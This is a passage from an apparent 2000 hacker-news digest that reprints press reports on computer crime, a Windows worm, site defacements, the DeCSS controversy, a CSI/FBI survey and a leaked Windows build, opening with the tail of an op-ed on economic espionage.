circumstances. You'd rather not go through the hassle of moving toward less dirigisme. It's so much easier to keep paying bribes. The Central Intelligence Agency collects other economic intelligence, but the vast majority of it is not stolen secrets. The Aspin-Brown Commission four years ago found that about 95% of U.S. economic intelligence comes from open sources. The Campbell report describes a sinister-sounding U.S. meeting in Washington where -- shudder! -- CIA personnel are present and the participants -- brace yourself -- "identify major contracts open for bid" in Indonesia. Mr. Campbell, I suppose, imagines something like this: A crafty CIA spy steals stealthily out of a safe house, changes disguises, checks to make sure he's not under surveillance, coordinates with a spy satellite and . . . buys an Indonesian newspaper. If you Europeans really think we go to such absurd lengths to obtain publicly available information, why don't you just laugh at us instead of getting in high dudgeon? What are the economic secrets, in addition to bribery attempts, that we have conducted espionage to obtain? One example is some companies' efforts to conceal the transfer of dual-use technology. We follow sales of supercomputers and certain chemicals closely, because they can be used not only for commercial purposes but for the production of weapons of mass destruction. Another is economic activity in countries subject to sanctions -- Serbian banking, Iraqi oil smuggling. But do we collect or even sort secret intelligence for the benefit of specific American companies? Even Mr. Campbell admits that we don't, although he can't bring himself to say so except with a double negative: "In general this is not incorrect." The Aspin-Brown Commission was more explicit: "U.S. Intelligence Agencies are not tasked to engage in 'industrial espionage' -- i.e. obtaining trade secrets for the benefit of a U.S. company or companies." The French government is forming a commission to look into all this. I hope the commissioners come to Washington. We should organize two seminars for them. One would cover our Foreign Corrupt Practices Act, and how we use it, quite effectively, to discourage U.S. companies from bribing foreign governments. A second would cover why Adam Smith is a better guide than Colbert for 21st-century economies. Then we could move on to industrial espionage, and our visitors could explain, if they can keep straight faces, that they don't engage in it. Will the next commission pursue the issue of rude American maitre d's? Get serious, Europeans. Stop blaming us and reform your own statist economic policies. Then your companies can become more efficient and innovative, and they won't need to resort to bribery to compete. And then we won't need to spy on you. @HWA 48.0 HNN:Mar 20th:LAPD Tells Parody Site To Chill ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Rho The Computer Crimes Division of the L.A. County Sheriff's Department has forced www.fortheloveofjulie.com to alter its content. Fearing that the fake stalking site was a little too real and that it could hamper probes of real crimes they strongly suggested that the owner make changes to the site or take it down. The site is meant to be entertaining and spooky similar to 'The Blair Witch Project'. CNN http://www.cnn.com/2000/TECH/computing/03/17/julie.folo/index.html Authorities tell faux-stalker site to tone it down March 17, 2000 Web posted at: 8:46 p.m. EST (0146 GMT) By D. Ian Hopper CNN Interactive Technology Editor (CNN) -- After getting over 2 million page views, the authors of a faux-stalker site got a call from someone who wasn't such a fan -- a police detective. A detective from the Computer Crimes Division of the L.A. County Sheriff's Department contacted Spark Factory president Tim Street Friday. According to authorities, the detective strongly suggested that Street take down FortheloveofJulie.com, a fake stalker site that aims to be an entertaining but spooky story in the tradition of last year's "The Blair Witch Project" phenomenon. The site is a shrine to "Julie" from her admirer, a video-store clerk who follows her home and to her work, taking videos and posting a journal complete with movie clips and pictures. The site has become very popular, Street says, through both word-of-mouth and media attention. While it's completely fake, many users failed to see a disclaimer because they're going through a publicized back door that bypasses SpookySites.com, where it's indexed. SpookySites contains a small disclaimer upon entering the site that informs users that the content within "may contain fictionalization." But like many others, the detective entered the site through a back door, missing the disclaimer. When he called Street, the site's author was skeptical. "He told me he was with the police department. I wanted to call him back to make sure, because practical jokes around here are running rampant," Street said. "One guy here said he was from the FBI." "We received a tip from an investigator on the East Coast," says Sgt. Larry Balich. Authorities found a photo in the site that clearly showed a vehicle and license plate, and traced it back to Street. "We thought we had a stalking situation on our hands," Balich says. "But we needed a victim. You can't investigate a case without a victim or witness, and we had neither." After contacting the district attorney's office, detectives found that no crime had been committed. Still, Street says, police "strongly suggested" that he take the site down or close the back door and make the disclaimer more obvious. "We're going to frame it inside CreepySites," Street said. "We'll have a bolder disclaimer that says FortheloveofJulie is fictitious, and Julie is not in any danger." "We don't think we have to," he says, "but we don't want to have any problems." Balich says the site was just a little too real and could hamper probes of real crimes. "It's troublesome to have something like this on the Internet," Balich says. "I consider it a misuse of a real positive thing." The site was taken down for most of the day but came back up in the afternoon with the intended changes. Street says he made the site as an "Internet soap opera" meant to entertain users who were in for a suspenseful thrill. "It's not our intent to be evil, creepy people," he says. "We're trying to showcase how this new experience can change entertainment on the Internet." Street says he has already left a message with the FBI to try to head off any more misunderstandings. @HWA 49.0 HNN:Mar 20th:New Windows Worm Virus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne A new worm virus that can shut down MS Windows platforms and make the operating system permanently unusable has been discovered by Computer Associates International. Once launched via MS Outlook under Windows 95, 98, 2000 or NT, Win32/Melting.Worm saves itself into a Windows directory under the name MeltingScreen.exe. It renames .exe files into .bin files. PC World http://www.pcworld.com/pcwtoday/article/0,1510,15777,00.html Windows �Worm� Virus Slithers Computer Associates identifies virus that travels through Outlook. by Kathleen Ohlson, Computerworld March 17, 2000, 6:56 a.m. PT A new worm now "in the wild" has the potential to shut down Windows platforms and make the operating system permanently unusable. Computer Associates International discovered the worm, Win32/Melting.worm, on Tuesday, when customers started to find it in their e-mail systems, says Narender Mangalam, director of security solutions at CA. So far, it has hit some Fortune 1000 software companies, he says. "The risk level is moderate, and it hasn't caused too much damage because we believe we've caught it in time," Mangalam says. CA markets InoculateIT, a virus detection and prevention program. The Melting Worm is unleashed through Microsoft's Outlook running on Windows 95, 98, 2000, or NT, according to CA representatives. Once launched, the worm puts a copy of itself into a Windows directory as MeltingScreen.exe and remains in memory. Files with .exe extensions in a system's Windows directory are renamed with .bin extensions. As the worm renames files, including ones critical to operating Windows, these changes may render the operating system useless. The worm also starts to e-mail itself to all the names in a victim's Outlook address book and randomly executes other .exe files, Mangalam says. This potentially can take down a company's e-mail system. @HWA 50.0 HNN:Mar 20th:GNIT Now Freeware ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by m0nk Ellicit Organization has released a freeware version of their latest program, GNIT NT Vulnerability Scanner. The scanner checks for over a dozen NT vulnerabilities. Ellicit.org http://security.ellicit.org/ @HWA 51.0 HNN:Mar 20th:Online Criminals Labeled Boffins ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by dogcow The Australian Federal Police Commissioner, Mick Palmer, was recently quoted as saying that while much of online crime is currently "in the early stages it is being done by people who simply are boffins and are doing it by way of exploration rather than criminal intent." (Glad to see that Australia is on top of Internet crime.) Sydney Morning Herald http://www.smh.com.au/news/0003/18/national/national6.html NATIONAL 'Police must get ahead of e-crime' By JANINE ISRAEL Undetected organised electronic-crime could undermine the nation's security and financial stability, the Australian Federal Police Commissioner, Mr Mick Palmer, warned yesterday. He told a conference of Australasian and south-west Pacific police commissioners in Canberra that a co-ordinated international response was required urgently to crack down on electronic terrorism, child pornography, racism, fraud and money laundering. Mr Palmer said the Internet meant crimes were being committed in countries where perpetrators had "never set foot" and international legislation and treaties must be set up to prosecute criminals irrespective of national borders. Australia, New Zealand, Fiji and Papua New Guinea police commissioners announced they would establish an Australasian Law Enforcement Electronic Crime Strategy to address the issue. Mr Palmer said the Australian police force lacked electronic expertise, and were looking to recruit computer boffins to tackle electronic crime. "We need to be buying those skills from the cutting edge of the technological workplace. We need to form close partnerships with the private sector and wider government agencies," he said. But employing people with the skills to fight electronic crime was costly. Retention was a problem in a competitive market where those with technological skills were lured by high salaries to the private sector. The international nature of cyberspace made it almost impossible to identify perpetrators let alone snare electronic criminals. Credit card fraud already was costing the credit card industry billions, Mr Palmer said. He said growing forms of e-crime included such things as money laundering and tax evasion. Cyber-stalking, illegal interceptions or "electronic eavesdropping" were a concern, as were political and industrial espionage. Fraudulent sales pitches along with bogus charitable or investment solicitations were increasingly common. These were not necessarily "new crimes", Mr Palmer said, just "new methods to commit traditional crimes". "One of the difficulties with electronic crime is that not only is it very intrusive and superficially invisible, but many crimes can be committed without the victim knowing it has been committed," he said. While e-crime is still in its "embryo state", authorities predict it will expand with the electronic market to become more organised and sophisticated. "Much of it in the early stages is being done by people who simply are boffins and are doing it by way of exploration rather than criminal intent. The damage caused by those activities is of course equally serious," he said. He said police were "alarmed" by the capability of people to commit offences on a global basis, with complete anonymity, with speed and on a large scale. A staggering 900 million people were expected to be using the Internet by the end of the year. @HWA 52.0 HNN:Mar 21st: Conflict In Kashmir Continues Online ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre Over 600 web sites in India including government systems have been defaced in recent months by people in Pakistan. The conflict in Kashmir is seen as one of the primary reasons for the defacements. CNN http://www.cnn.com/2000/TECH/computing/03/20/pakistani.hackers/index.html Kashmir conflict continues to escalate -- online By D. Ian Hopper CNN Interactive Technology Editor March 20, 2000 Web posted at: 8:15 p.m. EST (0115 GMT) (CNN) -- A group of Pakistani hackers has used the conflict in Kashmir as a reason to deface almost 600 Web sites in India and take control of several Indian government and private computer systems, according to the group. A computer security Web site -- attrition.org -- has records of the defacements claimed by the Muslim Online Syndicate. The M0S, which a member says consists of mostly Pakistani Muslims, is made up of self-proclaimed "hacktivists," those who commit computer crimes -- ranging from simple defacement to full-scale intrusions to denial of service attacks -- in order to bring attention to a social cause. The group has nine active members, according to a representative who spoke on behalf of the group on condition of anonymity. They range from 16 to 24 years old, the representative said. Several of them are students or computer professionals, and one is a medical student, the representative added. Unlike the majority of Web vandals, the MOS members say they secretly take control of a server, then deface the site only when they "have no more use" for the data or the server itself. "The servers we control range from harmless mail and Web services to 'heavy duty' government servers," says the MOS representative. "The data is only being categorically archived for later use if deemed necessary." The group says it's not interested in e-commerce sites or credit card information. Most of the group's defacements came in one fell swoop, when they broke into India's largest Internet service provider, IndiaLinks. While there, they defaced more than 500 sites hosted by the company, including many travel and company sites, IndiaLinks confirms. IndiaLinks, based in Bombay, hosts more than 6,000 Web sites, according to CEO Bhavin Chandarana. Chandarana says the group had access to servers co-hosted by Alabanza, an American ISP. He says the group had access for about an hour. The MOS won't be facing any legal problems stemming from its exploits, Chandarana says, because IndiaLinks was not able to get the server logs from Alabanza. Chandarana says his company is in the process of removing their business from the U.S. ISP. Representatives for Alabanza did not respond to several e-mails and two phone messages requesting comment. One of the Web sites defaced was that of the Indian Science Congress 2000. The ISC's local organizing secretary, Bhushan Patwardhan, told The Hindu newspaper that the defacement was removed as soon as it was detected. The MOS has a Web site mirroring its attacks that contains a well-known expletive. Expletives in domain names used to be taboo, but with the deregulation of domain registration, it is no longer forbidden. "We hope to bring the Kashmir conflict to the world's attention," MOS says. "We wish to see the day when our Muslim brethren will be given the right to choose, as was promised them half a century ago." India and Pakistan have fought two wars over the last half-century over rival claims for the Himalayan territory of Kashmir. They clashed again last summer when Pakistan-based fighters seized mountain peaks inside India. Hundreds of militants died before India and Pakistan -- under international and domestic pressure -- withdrew their forces. Ignoring world pressure, India and Pakistan both tested nuclear devices in 1998, dramatically escalating tensions. The stated goal of the MOS -- social action through hacking -- is becoming a more popular one. Hacktivists attacked the World Trade Organization Web site during their Seattle conference last year, and a mailing list helps concerned activists discuss strategy, targets and coordinate attacks. Rather than simply defacing sites, denial of service attacks have become the weapon of choice. Alex Fowler, Strategic Initiatives Director for the Electronic Frontier Foundation, predicted this escalation in October 1999 in an interview with CNN Interactive. "We will see very serious attacks. Information stealing could have very long-term consequences for consumers," Fowler said. @HWA 53.0 HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Army Maj. Sheryl French has said that the possibility exists for intruders to infiltrate the computer systems used in tanks and other armored vehicles. Modern tanks and ships make extensive use of computers, software and data communications links for functions such as navigation, targeting and command and control. DISA has already tested the possibility of inputting false navigation data into a ships computer from an unauthorized land based laptop. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0320/web-hacker-03-21-00.asp Hacker-controlled tanks, planes and warships? BY Dan Verton 03/21/2000 Army officials are worried that sophisticated hackers and other cybercriminals, including military adversaries, may soon have the ability to hack their way into and take control of major military weapon systems such as tanks and ships. Speaking this month at the annual Army Directors of Information Management Conference in Houston, Army Maj. Sheryl French, a program manager responsible for the Army�s Information Assurance Architecture for the Digitized Force, said the potential exists for hackers to infiltrate the computer systems used in tanks and other armored vehicles. Unlike in the past, today�s modern tanks and ships are almost entirely dependent on computers, software and data communications links for functions such as navigation, targeting and command and control. Although the Pentagon has always had computer security issues to deal with, "we�ve never had computers" in tanks and armored personnel carriers before, said French, pointing to a picture of an M-1 Abrams Main Battle Tank. In fact, the Defense Department has already tested and proven that hackers have the ability to infiltrate the command and control systems of major weapons, including Navy warships. According to a training CD-ROM on information assurance, published by the Defense Information Systems Agency, an Air Force officer sitting in a hotel room in Boston used a laptop computer to hack into a Navy ship at sea and implant false navigation data into the ship�s steering system. "Yes, this actually happened," the CD-ROM instructs military personnel taking the course. "Fortunately, this was only a controlled test to see what could be done. In reality, the type of crime and its objective is limited only by people�s imagination and ability." John Pike, a defense and intelligence analyst with the Federation of American Scientists, said that although there are well-known security gaps in the commercial systems that the Army plans to use on the battlefield, hacking into tanks and other weapons may prove to be too difficult for an enemy engaged in battle. "The problem for the enemy is that computer security vulnerabilities will almost certainly prove fleeting and unpredictable," said Pike, adding that such tactics would be nearly impossible to employ beyond the random harassment level. @HWA 54.0 HNN:Mar 21st:2600 AU to Broadcast DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by hool In yet another twist in the MPAA vs. DeCSS case 2600 of Australia plan to broadcast the source code of DeCSS on national TV. Australian Federal copyright laws can not currently prevent this broadcast. The information will be displayed at 12 frames per second, it is recommended that viewers tape record the information and review it later frame by frame. The code is expected to air sometime in the next few weeks between 3 and 4 am. Computerworld AU http://www.computerworld.idg.com.au/CWT1997.nsf/cwtoday/DB6C6D9B3448ECE64A2568A00075454B?OpenDocument 2600 AU http://www.2600.org.au ComputerWorld; Hackers with heart By Byron Kaye 13 March, 2000 SYDNEY - Loopholes in Federal laws mean hacker advocate group 2600 Australia will be able to broadcast DVD decryption codes and other sensitive information on national television within weeks. Grant Bayley, who heads up 2600 Australia, the international organisation's Australian operation, said it was currently devising a 15-second broadcast, which he said would contain text files, delivered at 12 frames per second, and suggestions pertaining to the "ethics" of datacasting, computer security and privacy, and access-controlling DVD encryption. Bayley said the text contained in the broadcast would not be comprehensible as it appeared live on television, but he suggested viewers record the broadcast on video and then watch the information afterwards "frame by frame". Bayley said the broadcast would be "fed" to Channel 10 by MindShare, a company that supplies advertising material in bulk for the television station. MindShare's own advertising slogan is "Head space invaders". The broadcast time was not yet known, but Bayley said it was expected to screen between 3:00 and 4:00 am "some time in the next few weeks". Bayley maintained information contained in the broadcast would "primarily encourage ethical", educational use of new technologies such as datacasting. However, he admitted some information -- pertaining to the decryption of DVD access codes -- which could not be legally broadcast in the US, would be screened. Australian Federal copyright laws, even those currently being amended, were unable to prevent broadcasting of information such as DVD decryption codes, regardless of how commercially crippling the information might potentially be, he said. Bayley said he was convinced that he knew the 15-year-old hacker who penetrated the ASX website two weeks ago "pretty well". The ASX hack caused an outage of four hours, leaving the site littered with banner messages reading "Prosthetic owns the ASX". Bayley maintained 2600 did not support or encourage vandalistic hack attacks such as this. "Stupid people do stupid things," he said. The title "2600" refers to the frequency of pitch that technology-savvy Americans played into their telephone receivers to thwart long distance call charges in the early 1980s. @HWA 55.0 HNN:Mar 21st:CIA Monitoring Upheld by Court ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The CIA's Foreign Bureau of Information Services policy allowing agency officials to monitor employees' Internet use has been upheld by federal appeals court. The policy included provisions to review employees' e-mail messages and to collect information on their Web site visits. The policy had helped convict a federal employee of downloading child pornography on government time. Government Executive Magazine http://www.govexec.com/dailyfed/0300/032000m1.htm March 20, 2000 DAILY BRIEFING Court upholds agency reviews of employees' Internet use By Kellie Lunney klunney@govexec.com A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time. The CIA's Foreign Broadcast Information Service implemented a policy in June 1998 authorizing "electronic audits" of employee computers in order to crack down on non-business related Internet use. Those audits included reviewing employees' e-mail messages and collecting information on their Web site visits. Later that summer, Science Applications International Corp. (SAIC), which had a contract to manage FBIS' computer network and monitor inappropriate Internet behavior, alerted the agency when the keyword "sex" turned up numerous hits in a firewall database during a routine test. The hits originated from the computer of Mark L. Simons, an electronic engineer at FBIS. FBIS officials then searched Simons' computer and office on four occasions, eventually compiling enough evidence to indict him on two counts of knowingly receiving and possessing child pornography downloaded from the Internet and stored on his government hard drive. Simons claimed that his Fourth Amendment rights had been violated during the searches. But a district court upheld the searches. Simons was found guilty and was sentenced to 18 months in jail. The U.S. Court of Appeals for the Fourth Circuit affirmed that decision in late February, saying that Simons failed to prove that he had a "legitimate expectation of privacy in the place searched or the item seized." According to the appeals court, "In the final analysis, this case involves an employee's supervisor entering the employee's government office and retrieving a piece of government equipment in which the employee had absolutely no expectation of privacy [due to the agency's Internet policy]�equipment that the employer knew contained evidence of crimes committed by the employee in the employee's office ... Here, there was a conjunction of the conduct that violated the employer's policy and the conduct that violated the criminal law." The court's decision in USA v. Simons (99-4238) is online at www.law.emory.edu/4circuit/feb2000/994238.p.html. @HWA 56.0 HNN:Mar 21st:Make Your Reservations for RootFest Now! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by rootfest RootFest is back for its second try. RootFest 2000 will be June 14-16, 2000, and will be held at the brand-new St. Paul RiverCentre facility just 15 minutes from the Mall of America. Three days of speakers, events, contests and more is planned, making this a can't-miss event. RootFest http://www.rootfest.org/ @HWA 57.0 HNN:Mar 22nd:Cybercrime On The Rise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Computer Security Institute and the San Francisco FBI Computer Intrusion Squad jointly released a report today that said that electronic crime cost companies at least $266 million last year. The study found that 70% of the responding companies detected the unauthorized use of their computer systems in the last 12 months up from 62% the year before. Insiders and disgruntled employees topped the lists of worrisome security threats. (One conclusion that can be drawn form this study is that e-crime is on the rise, another is that people are more willing to admit intrusions or that detection of criminal activity has gotten better. The numbers are interesting but really don't say anything.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2471718,00.html?chkpt=zdnntop Late Update 0943EST An anonymous person was kind enough to send us a link directly to the summary results of the above mentioned survey. Computer Security Institute http://www.gocsi.com/prelea_000321.htm ZDNet; Report: 'E-crime is booming' Some 70 percent of companies queried in a new study have detected attacks on their networks, the FBI/CSI reports. By Robert Lemos, ZDNet News UPDATED March 22, 2000 10:00 AM PT SAN FRANCISCO -- Just like e-commerce, electronic crime is a booming business, according to a survey released by the Computer Security Institute and the San Francisco FBI Computer Intrusion Squad on Wednesday. The study found that 70 percent of CSI's 585 member companies that responded to its survey detected the unauthorized use of their computer systems in the last 12 months -- up from 62 percent the year before. "Isn't e-commerce booming? Then e-crime is booming," said Richard Power, editorial director and analyst for the Computer Security Institute. "The Internet revolution is going on regardless, but the more commerce that goes online, the more crime that goes online as well." While not a scientific estimate of computer crime, the report does measure the anonymous admissions of more than 640 security professionals who are part of CSI. Insiders the biggest fear More than three-quarters of those professionals identified hackers as a security threat, but insiders concerned the respondents more, with 81 percent worried about disgruntled employees. CSI's Power explained that professional hackers are more of a threat, however. "That's the real problem, not a juvenile hacker," he said. "The point is, if a 16-year-old kid can do (what we have seen), then what are the professionals doing?" The report also indicates that corporate computer systems are far from secure. Almost 90 percent of the security professionals who answered the survey detected a security threat, which includes unauthorized access as well as improper use of a corporate computer or e-mail and computer viruses. Of those intrusions, only 42 percent of the companies affected put a dollar sign on the amount of damage done. The total: $266 million. With only one computer security administrator per 1,000 computers, the situation may not get any better soon. -=- CSI; Mar 22,2000 FOR IMMEDIATE RELEASE Contact: Patrice Rapalus, Director Computer Security Institute 600 Harrison Street San Francisco, CA 94107 415/905-2310 Internet: prapalus@cmp.com Ninety percent of survey respondents detect cyber attacks, 273 organizations report $265,589,940 in financial losses SAN FRANCISCO -- The Computer Security Institute (CSI) announced today the results of its fifth annual "Computer Crime and Security Survey." The "Computer Crime and Security Survey" is conducted by CSI with the participation of the San Francisco Federal Bureau of Investigation's (FBI) Computer Intrusion Squad. The aim of this effort is to raise the level of security awareness, as well as help determine the scope of computer crime in the United States. Highlights of the "2000 Computer Crime and Security Survey" include the following: Ninety percent of respondents (primarily large corporations and government agencies) detected computer security breaches within the last twelve months. Seventy percent reported a variety of serious computer security breaches other than the most common ones of computer viruses, laptop theft or employee "net abuse"--for example, theft of proprietary information, financial fraud, system penetration from outsiders, denial of service attacks and sabotage of data or networks. Seventy-four percent acknowledged financial losses due to computer breaches. Forty-two percent were willing and/or able to quantify their financial losses. The losses from these 273 respondents totaled $265,589,940 (the average annual total over the last three years was $120,240,180). Financial losses in eight of twelve categories were larger than in any previous year. Furthermore, financial losses in four categories were higher than the combined total of the three previous years. For example, 6I respondents quantified losses due to sabotage of data or networks for a total of $27,148,000. The total financial losses due to sabotage for the previous years combined totaled only $10,848,850. As in previous years, the most serious financial losses occurred through theft of proprietary information (66 respondents reported $66,708,000) and financial fraud (53 respondents reported $55,996,000). Survey results illustrate that computer crime threats to large corporations and government agencies come from both inside and outside their electronic perimeters, confirming the trend in previous years. Seventy-one percent of respondents detected unauthorized access by insiders. But for the third year in a row, more respondents (59%) cited their Internet connection as a frequent point of attack than cited their internal systems as a frequent point of attack (38%). Based on responses from 643 computer security practitioners in U.S. corporations, government agencies, financial institutions, medical institutions and universities, the findings of the "2000 Computer Crime and Security Survey" confirm that the threat from computer crime and other information security breaches continues unabated and that the financial toll is mounting. Respondents detected a wide range of attacks and abuses. Here are some other examples: 25% of respondents detected system penetration from the outside. 27% of respondents detected denial of service attacks. 79% detected employee abuse of Internet access privileges (for example, downloading pornography or pirated software, or inappropriate use of e-mail systems). 85% detected computer viruses. For the second year, we asked some questions about electronic commerce over the Internet. Here are some of the results: 93% of respondents have WWW sites. 43% conduct electronic commerce on their sites (in 1999, only it was only 30%). 19% suffered unauthorized access or misuse within the last twelve months. 32% said that they didn't know if there had been unauthorized access or misuse. 35% of those acknowledging attack, reported from two to five incidents. 19% reported ten or more incidents. 64% of those acknowledging an attack reported Web-site vandalism. 60% reported denial of service. 8% reported theft of transaction information. 3% reported financial fraud. Patrice Rapalus. CSI Director, suggests that the "Computer Crime and Security Survey," now in its fifth year, has delivered on its promise to raise the level of security awareness and help determine the scope of crime in the United States. "The trends the CSI/FBI survey has highlighted over the years are disturbing. Cyber crimes and other information security breaches are widespread and diverse. Ninety percent of respondents reported attacks. Furthermore, such incidents can result in serious damages. The 273 organizations that were able to quantify their losses reported a total of $265,589,940. Clearly, more must be done in terms of adherence to sound practices, deployment of sophisticated technologies, and most importantly adequate staffing and training of information security practitioners in both the private sector and government." Bruce J. Gebhardt is in charge of the FBI's Northern California office. Based in San Francisco, his division covers fifteen counties, including the continually expanding "Silicon Valley" area. Computer crime is one of his biggest challenges. "If the FBI and other law enforcement agencies are to be successful in combating this continually increasing problem, we cannot always be placed in a reactive mode, responding to computer crises as they happen. The results of the CSI/FBI survey provide us with valuable data. This information not only has been shared with Congress to underscore the need for additional investigative resources on a national level but identifies emerging crime trends and helps me decide how best to proactively, and aggressively assign resources, before those 'trends' become 'crises.'" ### CSI, established in 1974, is a San Francisco-based association of information security professionals. It has thousands of members worldwide and provides a wide variety of information and education programs to assist practitioners in protecting the information assets of corporations and governmental organizations. The FBI, in response to an expanding number of instances in which criminals have targeted major components of information and economic infrastructure systems, has established the National Infrastructure Protection Center (NIPC) located at FBI headquarters and the Regional Computer Intrusion Squads located in selected offices throughout the United States. The NIPC, a joint partnership among federal agencies and private industry, is designed to serve as the government's lead mechanism for preventing and responding to cyber attacks on the nation's infrastructures. (These infrastructures include telecommunications, energy, transportation, banking and finance, emergency services and government operations). The mission of Regional Computer Intrusion Squads is to investigate violations of Computer Fraud and Abuse Act (Title 8, Section 1030), including intrusions to public switched networks, major computer network intrusions, privacy violations, industrial espionage, pirated computer software and other crimes Copyright 2000 Computer Security Institute 600 Harrison Street San Francisco, CA 94107 Telephone: (415) 905-2626 Fax: (415) 905-2218. @HWA 58.0 HNN:Mar 22nd:The Next Version of Windows Leaked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench While Windows 2000 only just recently shipped Microsoft is already working on the next generation of the operating system. Code named Whistler, build 2211.1 has been liberally spread around pirate sites across the net. Beta News http://betanews.efront.com/article.php3?sid=953595359 ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2471310,00.html?chkpt=zdnntop Beta; Whistler Hits the Web By Nate Mook, eFront March 20th, 2000, 6:35 PM An internal build of Microsoft's future operating system, set to combine consumer and business versions into a product currently codenamed Whistler Windows 2001, has leaked out onto the Internet. Build number 2211.1 was posted onto various college and Internet sites early this morning and spread as per usual, like wildfire. While the new operating system currently looks almost identical to Windows 2000, a number of people who installed the leaked build stated there were a few HTML enhancements to folders, simplifying things for novice users. For example, the control panel is now by default an HTML interface, offering access to a few basic configuration options. Whistler does contain the infamous MarsCore.DLL file which started rumors last month regarding the purpose of Mars, now known to be part of the future version of Microsoft's MSN client. However, it is unknown whether or not the new HTML folders are part of the Mars core or if users will be given the opportunity to switch off more user friendly parts of the operating system. As usual with an early Alpha release, most new features and enhancements will not be added until Beta 1. Keep checking back for continued coverage regarding Microsoft Whistler. ActiveWin contributed to this report. -=- ZDNet; Windows 2001 leaked on the Web A pirated version of Windows 2001 is winding its way across the Net. And it looks a lot like today's Windows. By Mary Jo Foley, ZDNet News UPDATED March 21, 2000 2:03 PM PT Microsoft Corp.'s next full-fledged version of Windows, code-named Whistler, is at least a year away from release -- but already a pirated version of one of the latest builds has found its way onto the Net. As reported by the Windows enthusiast sites ActiveWin and BetaNews, a recent internal build of Whistler has been posted illegally to a number of college and Internet sites. ActiveWin and BetaNews are reporting that Build 2211.1 was posted Tuesday morning and "spread as per usual, like wildfire." Whistler is the code name for the first full-fledged upgrade to Windows 2000 that will be based on the Windows NT kernel, rather than the Windows 9X kernel. (The Windows 9X update is code-named Millennium and expected to ship in the third or fourth quarter of this year.) Whistler is tentatively slated to ship in March 2001, according to internal Microsoft documents. Microsoft (Nasdaq: MSFT) won't comment on where Whistler is in the development process. But sources close to the company say the latest "stable" internal developers build is numbered 2207. The most recent internal test build is 2214, sources add. A Microsoft spokesman said the company was investigating reports of pirated Whistler builds but would make no further comment. Looks like Win2000 -- so far As noted by ActiveWin, the pirated Whistler build looks almost identical to Windows 2000 Professional. "A number of people who installed the leaked build stated there were a few HTML enhancements to folders, simplifying things for novice users," ActiveWin reported. "For example, the control panel is now by default an HTML interface, offering access to a few basic configuration options." One change under the hood, according to ActiveWin, is the inclusion of the MarsCore.DLL file. "Mars" is the code name for user interface technology slated to be included in a future version of Microsoft's MSN client. At one point, Mars was used as the code name for the next version of a consumer-oriented version of Internet Explorer. After signing up Mars beta testers last fall, Microsoft sent out a note telling testers it had delayed the start of the beta because the company was "rethinking some of our most basic assumptions" regarding the future user interfaces. It isn't just in the user interface that Microsoft has been redrawing its Windows road map. In January, Microsoft acknowledged that it had tabled work on "Neptune," a consumer version of Windows slated to follow Millennium, and on "Odyssey," an NT-kernel-based follow-on to Windows 2000. Instead, Microsoft said, it planned to merge the Neptune and Odyssey code bases in the form of Whistler. The follow-on to Whistler, code-named Blackcomb, is expected to ship in 2002 or later. @HWA 59.0 HNN:Mar 22nd:Toronto Business Held For Extortion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench An unnamed business in the Toronto area was held for ransom of less than $5,000 after a 14 year old youth took control of the companies chat-room and email servers. Police arrested the individual after arranging a meeting to deliver the money. The youth has been charged with extortion, mischief to data, fraudulently possessing a computer password, production and possession of counterfeit money, and two counts of unauthorized use of a computer. (And they say there are not enough computer crime laws.) National Post http://www.nationalpost.com/news.asp?f=991222/158060&s2=national&s3=news Wednesday, December 22, 1999 14-year-old computer whiz charged after company given extortion demand Arrested in Keswick Chris Eby National Post A 14-year-old computer whiz, who allegedly hacked into the accounts of a downtown Toronto business and tried to extort the owners, was charged yesterday with a raft of extortion and counterfeiting-related offences after a police sting operation. The boy, who cannot be named under the Young Offenders Act, took control of the business's e-mail and chat rooms -- two operations vital to the business' survival -- for two weeks. He contacted the owner of the business through the Internet, demanding cash before he returned control of the accounts. "He obviously displays a capability in computers that appears to be above average," said Detective Myron Demkiw. "They're pretty serious offences ... this is all relatively new ground for everybody." The owner of the business contacted police, who traced the suspect to Keswick, a town 60 kilometres north of Toronto. Investigators arranged a meeting on Monday where the suspect was supposed to receive the money he was demanding (a sum less than $5,000 was all police would say), and was arrested. "He was calm throughout," Det. Demkiw said of the youth. As a result of the investigation, detectives executed a search warrant on the boy's home and seized his computer, related documents, and some counterfeit money. When asked if he had ever come across anything like this, Det. Demkiw replied: "No, never, and and this will be something new to the courts as well." The youth has been charged with extortion, mischief to data, fraudulently possessing a computer password, production of counterfeit money, and two counts each of unauthorized use of a computer, and possession of counterfeit money. @HWA 60.0 HNN:Mar 22nd:Is the Census Secure? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench 